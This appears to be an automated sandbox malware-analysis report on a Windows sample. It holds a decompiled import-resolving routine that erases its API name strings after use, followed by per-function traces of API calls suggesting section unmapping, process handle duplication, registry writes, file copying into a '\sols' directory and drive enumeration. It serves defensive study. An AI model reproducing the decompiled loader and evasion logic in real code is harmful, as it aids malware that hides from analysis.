				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 001C1B85, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79 Total matches: 31memoryfilestring
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C27F6, Relevance: 12.1, APIs: 8, Instructions: 52 Total matches: 80registry
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCEC, Relevance: 10.7, APIs: 7, Instructions: 161 Total matches: 54memorythreadsleep
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9D54, Relevance: 10.6, APIs: 7, Instructions: 144 Total matches: 54memoryregistry
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9692, Relevance: 10.6, APIs: 7, Instructions: 138 Total matches: 53string
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9BEF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125 Total matches: 48memory
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDB50, Relevance: 10.6, APIs: 7, Instructions: 122 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB703, Relevance: 10.6, APIs: 7, Instructions: 112 Total matches: 56synchronizationthread
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1F61, Relevance: 10.6, APIs: 7, Instructions: 110 Total matches: 25memoryfilestring
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C70F5, Relevance: 10.6, APIs: 7, Instructions: 91 Total matches: 60memorystringsynchronization
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6DF6, Relevance: 10.6, APIs: 7, Instructions: 90 Total matches: 57filesynchronization
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
